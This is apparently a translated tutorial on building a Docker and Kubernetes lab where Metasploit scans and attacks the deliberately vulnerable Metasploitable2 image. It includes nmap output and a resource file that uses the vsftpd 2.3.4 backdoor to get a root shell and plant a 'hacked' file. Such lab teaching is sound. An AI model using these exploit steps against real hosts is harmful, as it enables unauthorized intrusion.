The purpose of this article is to make it easy to build a penetration test environment without any other complicated settings as long as Docker and Kubernetes are installed.
[Please note that if the content described in this article is applied to a server or network that is not managed by you, it may violate the Unauthorized Access Prohibition Law].
Environment used in this article
$ cat / etc / lsb-release
DISTRIB_ID = Ubuntu
DISTRIB_RELEASE = 16.04
DISTRIB_CODENAME = xenial
DISTRIB_DESCRIPTION = "Ubuntu 16.04.5 LTS"
$ docker --version
Docker version 18.09.0, build 4d60db4
$ minikube version
minikube version: v0.29.0
Things necessary
Everything I plan to use this time is on GitHub and Docker Hub . There is also a Dockerfile of Metasploit image on GitHub , so please modify it to make it easier to use.
Now, let’s execute the commands below in order to get what you need.
$ git clone https://github.com/SauravBrahma/MetasploitImage.git
$ docker pull sauravbrahma / metasploit_image
$ docker pull tleemcjr / metasploitable2
Up to this point, we have obtained what we need this time, so let’s actually move it.
Environment construction with Docker
$ docker run --rm -it tleemcjr / metasploitable2: latest sh -c "/bin/services.sh && bash"
* Starting web server apache2 [ OK ]
* Starting deferred execution scheduler atd [ OK ]
* Starting periodic command scheduler crond [ OK ]
・
・
・
* Starting internet superserver xinetd [ OK ]
* Doing Wacom setup ... [ OK ]
* Running local boot scripts ( /etc/rc.local ) [ OK ]
root @ c3803e096580: / #
# Record the IP address as you will need it later when specifying the attack target.
root @ c3803e096580: / # ifconfig | grep 172
inet addr: 172.17.0.5 Bcast: 172.17.255.255 Mask: 255.255.0.0
# Enter Ctrl-p and Ctrl-q to exit the container while it is still running, and then use the following command to check if the container is running.
$ docker ps | grep tleemcjr / metasploitable2
c3803e096580 tleemcjr / metasploitable2: latest "sh -c'/ bin / service…" 8 minutes ago Up 8 minutes vigorous_kalam
$ docker run --rm -it sauravbrahma / metasploit_image: latest bash
* Starting PostgreSQL 9.3 database server [ OK ]
msf_user @ ef8a1f8f6923: / opt / metasploit-framework $
With the above, the environment construction using Docker was completed. Also, this time, an --rmoption is added at runtime so that no extra container remains .
Do a penetration test with Docker
Here, let’s actually perform a penetration test using Docker. Since you are currently logged in to the attack container, msfconsoleenter the command to launch the Metasploit console.
msf_user @ c9521edd20f4: / opt / metasploit-framework $ msfconsole
** Welcome to Metasploit Framework Initial Setup **
Please answer a few questions to get started.
** Metasploit Framework Initial Setup Complete **
.: okOOOkdc ''' cdkOOOko :.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
: OOOOOOOOOOOOOOOOOk ,, kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO :: OOOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl., OOOOOOOOOo
dOOOOOOOO. .cOOOOOc., OOOOOOOox
lOOOOOOOO .; D ;, OOOOOOOOl
.OOOOOOOO.. ; ; , OOOOOOOO.
cOOOOOOO. .OOc.'OOO. , OOOOOOOc
oOOOOOO. .OOOO.: OOOO., OOOOOOOo
lOOOOO. .OOOO.: OOOO., OOOOOl
; OOOO'.OOOO .: OOOO .; OOOO ;
.dOOo .OOOOocccxOOOO. XOOd.
, kOl .OOOOOOOOOOOOO. .DOk,
: kk ; .OOOOOOOOOOOOO.cOk :
; kOOOOOOOOOOOOOOOk:
, xOOOOOOOOOOOx,
.lOOOOOOOl.
, dOd,
..
= [ Metasploit V4.17.35-dev- ]
+ - - = [ 1845 exploits - 1044 auxiliary - 320 post ]
+ - - = [ 541 payloads - 44 encoders - 10 nops ]
+ - - = [ the Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
This time, I would like to proceed in the following order.
- Store the result of applying Nmap to Metasploittable in the database
- Decide which module to use and attack
You've been hackedLeave a text file in Metasploitable as evidence of a successful attack- Check if the text file remains on the Metasploittable side
Let’s attack!
Store the result of applying Nmap to Metasploittable in the database
First, let’s check if Metasploit is connected to the database.
msf > db_status
[ * ] postgresql connected to msf_database
msf >
Since the Docker image used this time is connected to the database from the beginning, it should output as above.
Now, let’s apply Nmap to Metasploittable and store the result in the database.
Msf > Db_nmap -A 172.17.0.2
[ * ] Nmap: Starting Nmap 7.01 ( Https://Nmap.Org ) At 2019-01-25 08:56 UTC
[ * ] Nmap: Nmap Scan Report For 172.17.0.2
[ * ] Nmap: Host is up ( 0.00054s latency ) .
[ * ] Nmap: Not shown: 980 closed ports
[ * ] Nmap: PORT STATE SERVICE VERSION
[ * ] Nmap: 21 / tcp open ftp vsftpd 2.3.4
[ *]] Nmap: | _ftp-anon: Anonymous FTP login allowed ( FTP code 230 )
[ * ] Nmap: 22 / tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 ( protocol 2.0 )
[ * ] Nmap: | ssh-hostkey:
[ * ] Nmap : | 1024 60: 0f: cf: e1: c0: 5f: 6a: 74: d6: 90: 24: fa: c4: d5: 6c: cd ( DSA )
[ * ] Nmap: | _ 2048 56:56:24 : 0f: 21: 1d: de: a7: 2b: ae: 61: b1: 24: 3d: e8: f3 ( RSA )
[ * ] Nmap: 23 / tcp open telnet Linux telnetd
[ * ]Nmap: 25 / tcp open smtp Postfix smtpd
[ * ] Nmap: | _smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
[ * ] Nmap: | ssl-cert: Subject: commonName = ubuntu804-base.localdomain / organizationName = OCOSA / stateOrProvinceName = There is no such thing outside US / countryName = XX
[ * ] Nmap: | Not valid before: 2010-03-17T14: 07: 45
[ * ] Nmap : | _Not valid after: 2010-04-16T14: 07: 45
[ * ]Nmap: | _ssl-date: 2019-01-25T08: 58: 24 + 00: 00 ; 0s from scanner time.
[ * ] Nmap: 111 / tcp open rpcbind 2 ( RPC # 100000)
[ * ] Nmap: | rpcinfo:
[ * ] Nmap: | program version port / proto service
[ * ] Nmap: | 100000 2 111 / tcp rpcbind
[ * ] Nmap: | 100003 2,3,4 2049 / tcp nfs
[ * ] Nmap: | 100003 2,3 , 4 2049 / udp nfs
[ * ] Nmap: | 100005 1,2,3 50419 / tcp mountd
[* ] Nmap: | 100005 1,2,3 58275 / udp mountd
[ * ] Nmap: | 100021 1,3,4 33414 / tcp nlockmgr
[ * ] Nmap: | 100021 1,3,4 58022 / udp nlockmgr
[ * ] Nmap: | 100024 1 42939 / tcp status
[ * ] Nmap: | _ 100024 1 49024 / udp status
[ * ] Nmap: 139 / tcp open netbios-ssn Samba smbd 3.X ( workgroup: WORKGROUP )
[ * ] Nmap: 445 / tcp open netbios-ssn Samba smbd 3.X ( workgroup: WORKGROUP )
[* ] Nmap: 512 / tcp open exec netkit-rsh rexecd
[ * ] Nmap: 513 / tcp open login
[ * ] Nmap: 514 / tcp open tcpwrapped
[ * ] Nmap: 1099 / tcp open java-rmi Java RMI Registry
[ *] ] Nmap: 1524 / tcp open ingreslock?
[ * ] Nmap: 2121 / tcp open ftp ProFTPD 1.3.1
[ * ] Nmap: 3306 / tcp open mysql MySQL 5.0.51a-3ubuntu5
[ * ] Nmap: | mysql-info:
[ * ] Nmap: | Protocol: 53
[ *] Nmap: | Version: .0.51a-3ubuntu5
[ * ] Nmap: | Thread ID: 9
[ * ] Nmap: | Capabilities flags: 43564
[ * ] Nmap: | Some Capabilities: Support41Auth, Speaks41ProtocolNew, ConnectWithDatabase, SwitchToSSLAfterHandshake, SupportsCompression, SupportsTransactions, LongColumnFlag
[ * ] Nmap: | Status: Autocommit
[ * ] Nmap: | _ Salt: g> = Vy7. ~ VoOz <W # H! Ju
[ * ] Nmap: 5432 / tcp open postgresql PostgreSQL DB 8.3.0- 8.3.7
[ * ]Nmap: 5900 / tcp open vnc VNC ]( protocol 3.3 )
[ * ] Nmap: | vnc-info:
[ * ] Nmap: | Protocol version: 3.3
[ * ] Nmap: | Security types:
[ * ] Nmap: | _ Unknown security type ( 33554432 )
[ * ] Nmap : 6000 / tcp open X11 ( access denied )
[ * ] Nmap: 6667 / tcp open irc Unreal ircd
[ * ] Nmap: | irc-info:
[ *Nmap: | users : 1
[ * ] Nmap: | servers: 1
[ * ] Nmap: | lusers: 1
[ * ] Nmap: | lservers: 0
[ * ] Nmap: | server: irc.Metasploitable.LAN
[ * ] Nmap : | version: Unreal3.2.8.1. irc.Metasploitable.LAN
[ * ] Nmap: | uptime : 0 days, 0:32:56
[ * ] Nmap: | source ident: nmap
[ * ] Nmap: | sourcehost: 36620686.BF756E4.69365C88.IP
[ * ]Nmap: | _ error: Closing Link: pepuwvzow [172.17.0.3] ( Quit: pepuwvzow )
[ * ] Nmap: 8009 / tcp open ajp13 Apache Jserv ( Protocol v1.3 )
[ * ] Nmap: | _ajp-methods: Failed to get a valid response for the OPTION request
[ * ] Nmap: 8180 / tcp open http Apache Tomcat / Coyote JSP engine 1.1
[ * ] Nmap: | _http-favicon: Apache Tomcat
[ * ] Nmap: | _http-server-header: Apache -Coyote / 1.1
[ * ] Nmap: | _http-title: Apache Tomcat / 5.5
[ * ] Nmap: 1 service unrecognized despite returning data. If you know the service / version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service:
[ * ] Nmap : SF-Port1524-TCP: V = 7.01% I = 7% D = 1/25% Time = 5C4ACF30% P = x86_64-pc-linux-gnu% r ( NU
・
・
・
[ * ] Nmap: Host script results:
[ * ] Nmap: | _nbstat: NetBIOS name: 14586EEA2FB4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> ( unknown )
[ * ] Nmap: | smb-os-discovery:
[ * ] Nmap: | OS: Unix ( Samba 3.0.20-Debian )
[ * ] Nmap: | NetBIOS computer name:
[ * ] Nmap: | Workgroup: WORKGROUP
[ * ] Nmap: | _ System time : 2019-01- 25T03: 58: 24-05: 00
[ * ]Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[ * ] Nmap: Nmap done : 1 IP address ( 1 host up ) scanned in 137.18 seconds
msf >
-ASince we are using the option, it will take some time, but please be patient.
With this, I was able to know various information such as the target free port, services and OS that are likely to be running there. By the way, these are naturally stored in the database of the container you are currently logged in to, so you can also see the information by sending a query from SQL.
msf > exit
msf_user @ c9521edd20f4: / opt / metasploit-framework $ psql -U msf_user msf_database
psql ( 9.3.17 )
Type "help" for help.
msf_database = # SELECT * FROM services;
id | host_id | created_at | port | proto | state | name | updated_at | info
---- + --------- + ---------- ------------------ + ------ + ------- + ------- + -------- ----- + ----------------- + --------------- -----------------------------
1 | 1 | 2019-01-25 08: 58: 27.315887 | 21 | tcp | open | ftp | 2019-01-25 08: 58: 27.315887 | vsftpd 2.3.4
2 | 1 | 2019-01-25 08: 58: 27.777045 | 22 | tcp | open | ssh | 2019-01-25 08: 58: 27.777045 | OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
3 | 1 | 2019-01-25 08: 58: 27.815226 | 23 | tcp | open | telnet | 2019-01-25 08: 58: 27.815226 | Linux telnetd
4 | 1 | 2019-01-25 08: 58: 27.848245 | 25 | tcp | open | smtp | 2019-01-25 08: 58: 27.848245 | Postfix smtpd
5 | 1 | 2019-01-25 08: 58: 27.913605 | 111 | tcp | open | rpcbind | 2019-01-25 08: 58: 27.913605 | 2 RPC # 100000
6 | 1 | 2019-01-25 08: 58: 27.956202 | 139 | tcp | open | netbios-ssn | 2019-01-25 08: 58: 27.956202 | Samba smbd 3.X workgroup: WORKGROUP
7 | 1 | 2019-01-25 08: 58: 27.989778 | 445 | tcp | open | netbios-ssn | 2019-01-25 08: 58: 27.989778 | Samba smbd 3.X workgroup: WORKGROUP
8 | 1 | 2019-01-25 08: 58: 28.026979 | 512 | tcp | open | exec | 2019-01-25 08: 58: 28.026979 | netkit-rsh rexecd
9 | 1 | 2019-01-25 08: 58: 28.059262 | 513 | tcp | open | login | 2019-01-25 08: 58: 28.059262 |
10 | 1 | 2019-01-25 08: 58: 28.096009 | 514 | tcp | open | tcpwrapped | 2019-01-25 08: 58: 28.096009 |
11 | 1 | 2019-01-25 08: 58: 28.135852 | 1099 | tcp | open | java-rmi | 2019-01-25 08: 58: 28.135852 | Java RMI Registry
12 | 1 | 2019-01-25 08: 58: 28.182279 | 1524 | tcp | open | ingreslock | 2019-01-25 08: 58: 28.182279 |
13 | 1 | 2019-01-25 08: 58: 28.239117 | 2121 | tcp | open | ftp | 2019-01-25 08: 58: 28.239117 | ProFTPD 1.3.1
14 | 1 | 2019-01-25 08: 58: 28.270095 | 3306 | tcp | open | mysql | 2019-01-25 08: 58: 28.270095 | MySQL 5.0.51a-3ubuntu5
15 | 1 | 2019-01-25 08: 58: 28.302865 | 5432 | tcp | open | postgresql | 2019-01-25 08: 58: 28.302865 | PostgreSQL DB 8.3.0 --8.3.7
16 | 1 | 2019-01-25 08: 58: 28.328482 | 5900 | tcp | open | vnc | 2019-01-25 08: 58: 28.328482 | VNC protocol 3.3
17 | 1 | 2019-01-25 08: 58: 28.372125 | 6000 | tcp | open | x11 | 2019-01-25 08: 58: 28.372125 | access denied
18 | 1 | 2019-01-25 08: 58: 28.399048 | 6667 | tcp | open | irc | 2019-01-25 08: 58: 28.399048 | Unreal ircd
19 | 1 | 2019-01-25 08: 58: 28.435059 | 8009 | tcp | open | ajp13 | 2019-01-25 08: 58: 28.435059 | Apache Jserv Protocol v1.3
20 | 1 | 2019-01-25 08: 58: 28.479801 | 8180 | tcp | open | http | 2019-01-25 08: 58: 28.479801 | Apache Tomcat / Coyote JSP engine 1.1
( 20 rows )
msf_database = # \ q
msf_user @ c9521edd20f4: / opt / metasploit-framework $
By storing the result of Nmap application in the database in this way, you can import it when automating or export the result. Also, when multiple entries exist in the database, it is hostspossible to select an attack target that meets the conditions by using commands.
Decide which module to use and attack
Now DEPRECATEDit’s gone, but Metasploit has db_autopwna plugin for automatic attacks. db_autopwnIs an excellent one that automatically attacks with the information obtained from the database about the attack target. Even in Docker image you are using this time db_autopwnyou Yes is set to use the ( load db_autopwnand db_autopwn <option>can be used by running the two commands) is, for true vulnerability is too much, this time without the use of ” six of the attack automated technique ” Choose a different method from. There is a description about the resource file that can automate the console in this. This seems to automate the task by writing the task to be performed many times in the resource file. Furthermore, ~/.msf4/if you put the resource file below, it seems that the contents will be executed every time you call the console.
This time, I will not attack it many times, but it seems that it can be used with Kubernetes, which will be described later, so I would like to attack using a resource file. Also, from the Nmap results, I found that the ftp service is running on port 21, so this time I will use a famous module related to ftp. easy_pentes.rc
use exploit / unix / ftp / vsftpd_234_backdoor
set RHOST 172.17.0.2
exploit -z
sessions -i 1 -c "id"
sessions -i 1 -c "pwd"
sessions -i 1 -c "echo \" You've been hacked \ "> /hacked.txt"
exit -y
That’s all you have to write in the resource file. Only the module to be used, the IP of the attack target, and the execution instruction. By the way, in the sessionscommand part, -iyou can optionally -cspecify the instruction you want to execute for which session .
Let’s execute this resource file from Metasploit immediately.
msf_user @ c9521edd20f4: /opt/metasploit-framework $ msfconsole -q -r easy_pentes.rc
[ * ] Processing easy_pentes.rc for ERB directives.
resource ( easy_pentes.rc )> use exploit / unix / ftp / vsftpd_234_backdoor
resource ( easy_pentes.rc )> set RHOST 172.17.0.2
RHOST => 172.17.0.2
resource ( easy_pentes.rc )> exploit -z
[ * ] 172.17.0.2:21 --Banner : 220 ( vsFTPd 2.3.4 )
[ * ] 172.17.0.2:21 --USER : 331 Please specify the password.
[ +] 172.17. 0.2: 21 --Backdoor service has been spawned, handling ... [ +] 172.17.0.2:21 --UID
: uid = 0 ( root ) gid = 0 ( root )
[ * ] Found shell.
[ * ] Session 1 created inthe background.
Resource ( Easy_pentes.Rc )> Sessions -I 1 -C "Id"
[ * ] Running 'Id' On Shell Session 1 ( 172.17.0.2 )
Uid = 0 ( Root ) Gid = 0 ( Root )
Resource ( Easy_pentes.Rc )> Sessions -I 1 -C "Pwd"
[ * ] Running 'Pwd' On Shell Session 1 ( 172.17.0.2 )
/
Resource ( Easy_pentes.Rc )> Sessions -I 1 -C "Echo \" You'Ve Been Hacked \ " > /Hacked.Txt"
[ * ] Running 'Echo "You' Ve Been Hacked "> /Hacked.Txt 'On shell session 1 (172.17.0.2)
resource (easy_pentes.rc)> exit -y
msf_user @ c9521edd20f4: / opt / metasploit-framework $
It seems that he was able to attack safely. You can confirm that the root authority has been stolen by this attack. Also, the directory at the time of the successful attack /seems to be the top . You can also add an option to the msfconsolecommand to -rread the resource file -qand add an option to remove the banner.
Check if the text file remains on the Metasploittable side
Let’s confirm from the Metasploittable side that the attack was successful. Please log in to the Metasploittable side. As I confirmed earlier hacked.txt, the directory where I wrote /should be, so I should not have to move the directory in particular.
root @ ee769a0fc9f6: / # ls
bin boot cdrom core dev etc hacked.txt home initrd initrd.img lib lost + found media mnt nohup.out opt proc root sbin srv sys tmp usr var vmlinuz
root @ ee769a0fc9f6: / # cat hacked.txt
You've been hacked
root @ ee769a0fc9f6: / #
It was confirmed that it was infringed from the Metasploittable side as well.
That’s all for the penetration test using Docker.
Try making a lot with Kubernetes
$ kubectl apply -f yaml / metasploit.yaml
replicaset.apps/metasploit-rc created
$ kubectl apply -f yaml / metasploitable.yaml
replicaset.apps/metasploitable2-rc created
$ kubectl get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE
metasploit-rc-nxwd2 1/1 Running 0 17s 172.17.0.5 minikube
metasploitable2-rc-f9dzd 1/1 Running 0 11s 172.17.0.6 minikube
metasploitable2-rc-mbz95 0/1 ContainerCreating 0 11s <none> minikube
metasploitable2-rc-s2lwh 0/1 ContainerCreating 0 11s <none> minikube
$ kubectl get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE
metasploit-rc-nxwd2 1/1 Running 0 23s 172.17.0.5 minikube
metasploitable2-rc-f9dzd 1/1 Running 0 17s 172.17.0.6 minikube
metasploitable2-rc-mbz95 1/1 Running 0 17s 172.17.0.8 minikube
metasploitable2-rc-s2lwh 1/1 Running 0 17s 172.17.0.7 minikube
This time, I used the ReplicaSet resource because I wanted to easily create many Metasploit Pods and Metasploittable Pods. By default, one Metasploit Pod and three Metasploittable Pods are created, but you can spec.replicascreate as many verification environments as you like by changing the fields of each YAML file .
Now let’s go into one of the above pods and see if we can communicate with the other pods.
$ kubectl exec -it metasploit-rc-nxwd2 bash
msf_user @ metasploit-rc-nxwd2: / opt / metasploit-framework $ ping 172.17.0.6
PING 172.17.0.6 ( 172.17.0.6 ) 56 ( 84 ) bytes of data.
64 bytes from 172.17.0.6 : icmp_seq = 1 ttl = 64 time = 0.088 ms
64 bytes from 172.17.0.6 : icmp_seq = 2 ttl = 64 time = 0.049 ms
64 bytes from 172.17.0.6 : icmp_seq = 3 ttl = 64 time = 0.039 ms
64 bytes from 172.17.0.6 : icmp_seq = 4 ttl = 64 time = 0.040 ms
^ C
--- 172.17.0.6 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min / avg / max / mdev = 0.039 / 0.054 / 0.088 / 0.020 ms
It seems that you can communicate safely. With the above, the environment construction using Kubernetes was completed.
You can also perform penetration testing on Kubernetes in the same way as shown in Docker.